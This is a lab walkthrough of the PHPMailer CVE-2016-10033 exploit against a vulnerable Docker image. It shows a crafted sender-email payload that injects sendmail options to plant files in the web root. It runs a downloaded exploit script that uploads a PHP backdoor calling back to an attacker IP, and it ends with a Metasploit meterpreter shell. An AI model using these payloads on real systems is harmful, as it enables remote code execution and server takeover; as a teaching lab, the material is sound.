First let’s get the Vulnerable application up and running
Step 1: Run the following command to retrieve the vulnerable Docker Image from the Docker repository.
Command: docker pull vulnerables/cve-2016-10033
You can now access the vulnerable website at localhost:8080 in the web browser.
Name Input: OSEC (can be any string, this does not affect the exploit)
Crafted Sender Email: "attacker\" -oQ/tmp/ -X/www/pwn.html some"@email.com
How this crafted sender email works is explained in depth under the description section of the attack vector. As for the specific parameters the second parameter -oQ/tmp specifies the queue directory and the third parameter, -X/www/pwn.html specifies the location of the log file to be written.
If the queue directory is not specified the sendmail process would attempt to access the default mail queue directory (/var/spool/mqueue-client/)which would be protected to prevent unauthorized access and tampering, which is a common security measure. To avoid this permission issue, you should specify a queue directory where the user running the PHP script has write permissions. Commonly, a directory like /tmp is used because it is typically writable by all users.
If the body of the email contains PHP code, and if the specified log file is placed in a web-accessible directory, the attacker can execute the PHP code by accessing the log file via a web browser, hence resulting in remote code execution.
Message Input: This is just an example html file that an attacker could upload. Of course, the attacker could upload something much worse like a backdoor which we will be doing in the next method of exploitation
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Hacked!</title>
<style>
body {
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
margin: 0;
}
.container {
text-align: center;
}
</style>
</head>
<body>
<div class="container">
<h1 style="color: red;">Congratulations! You've been hacked!</h1>
<div>
<iframe src="https://giphy.com/embed/B4dt6rXq6nABilHTYM" width="480" height="452" frameBorder="0" class="giphy-embed" allowFullScreen></iframe>
<p><a href="https://giphy.com/gifs/fun-meme-hacker-B4dt6rXq6nABilHTYM"></a></p>
</div>
</div>
</body>
</html>Step 2: After submitting the form browse to the html file that we just uploaded at http://localhost:8080/pwn.html
Step 1: Download the exploit script at https://legalhackers.com/exploits/CVE-2016-10033/10045/10034/10074/PwnScriptum_RCE_exploit.py
Command: python2 /home/kali/PwnScriptum_RCE_exploit.py -url http://192.168.79.1:8080 -cf / -ip 192.168.79.149 --post-action submit --post-msg message -d /www
-url -> specifies the target url
-cf -> specifies the location of the contact form within the url specified in -url. (In our case it’s the exact same as -url so we just included a slash)
-ip -> specifies the attcakers ip for the backdoor to connect back to
-d -> specifies the relative directory to upload the backdoor php file
--post-action -> The name attribute of the hidden field
--post-msg -> The name attribute of the message input field
Note: The reason why we have to specify --post-action to “submit” and --post-msg to “message” is because in the vulnerable application that we are using the name attribute is different from the default values used in the python exploit script
The name attributes in the vulnerable application:
The default name attributes specified in the script:
In the above image you can see that the program is trying to access http://127.0.0.1:8080//www/phpbackdoor9284.php which is obviously incorrect because of //www. This will not work because in this vulnerable website /www is the website root, hence you can’t travel to http://127.0.0.1:8080/www since http://127.0.0.1:8080 is already at /www.
Also in the below image we can see that the exploit actually worked because the phpbackdoor9284.php has been created successfully in the directory. Hence the only issue was how to remove that //www from the url.
Upon further inspection of the python script, we managed to locate the BACKDOOR_URL variable which specifies the URL to the backdoor php file.
In the variable we can see that a the target directory that we specified (args.TARGET_UP_DIR) is being concatenated together with the BACKDOOR_FILE variable.
To solve the problem, we need to remove that and the additional slash.
Before:
After:
Step 4: Now run the previous command again, and this time the backdoor should have been successfully uploaded to the web root directory and should have connected back to my kali.
Step 1: Type msfconsole on kali terminal to open Metasploit. Then search for Metasploit modules for CVE-2016-10033. Then choose the module by choosing the index associated with it. In the below screenshot we chose 1 which targets PHPMailer < 5.2.18.
Commands:
msfconsole
search CVE-2016-10033
use 1
Step 2: Set the required options for the exploit module such as the target’s IP address, port,target URL and web root.
Commands:
set RHOSTS 192.168.79.1 (specifies the target’s IP)
set RPORT 8080 (specifies the target’s port)
set TARGETURI /(specifies the web form’s URL)
set WEB_ROOT /www (specifies where the website root is located)
Step 3: Type “exploit” to run the exploit. If all goes well you should get back a meterpreter shell of the target machine as shown below.
Command: exploit
We have come to the end of the POC.
PHPMailer class uses PHP mail() function as its default transport.
The transport is implemented using the mailSend() function:
If you look at line 12,
the sender address is concatenated with -f as per PHP documentation of the mail() function to tell the sendmail binary that the string after the -f argument is the Sender’s email address.
At the last line of the mailSend() function,
all the arguments that are required by the PHP mail() function is passed including the 5th parameter of $params which allows to pass extra parameters to sendmail binary.
The picture below shows the parameters that the mail() function takes in which matches the parameters that the mailSend() function passes.
As seen above we know that the $params string is built from the Sender variable. This is Sender string is normally set using the setFrom() method which validates the Sender’s address that the user types in the webform.
Due to the validateAddress() function validation, PHPMailer would for example reject a email like,
attacker -InjectedParam2 @attacker.com
which would prevent injection of additional parameters to Sendmail via the mail() function.
Upon further research by the founder of the CVE he realized that the validation is actually done using the RFC 3696 specification.
The RFC allows emails to contain spaces when quoted with ". Hence the following email address would be accepted by the setFrom() method:
"Attacker -Param2 -Param3"@test.com
Which would then be passed to the mailSend() function and then to the PHP mail() function which would then execute /usr/bin/sendmail , the MTA(Mail Transfer Agent) binary, with the
following list of arguments:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t] (read recipients from headers)
Arg no. 2 == [-i] (ignore dots on lines)
Arg no. 3 == [-f”Attacker -Param2 -Param3”@test.com]
In other words like this:
which would not work for the attacker since Param2 and Param3 are passed within the same argument number 3 which specifies the sender’s address.
However attackers can break out of this by some extra escaping. By injecting an extra sequence of \" into the sender email after the first argument,
"Attacker \" -Param2 -Param3"@test.com
and when passed on to PHPMailer and eventually to the mail() function, it would execute sendmail binary with the following list of arguments
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fAttacker\]
Arg no. 4 == [-Param2]
Arg no. 5 == [-Param3"@test.com]
In other words like this:
Hence this time attackers would be able to inject additional parameters, in this case parameter 4 and 5.
This vulnerability was found by Dawid Golunski.
The docker Image was created by opsxcq - https://github.com/opsxcq
and last but not least my lovely group members whom helped me with the POC :
Xavion - https://www.linkedin.com/in/xaviontok/
Brandon - https://www.linkedin.com/in/brandontyf/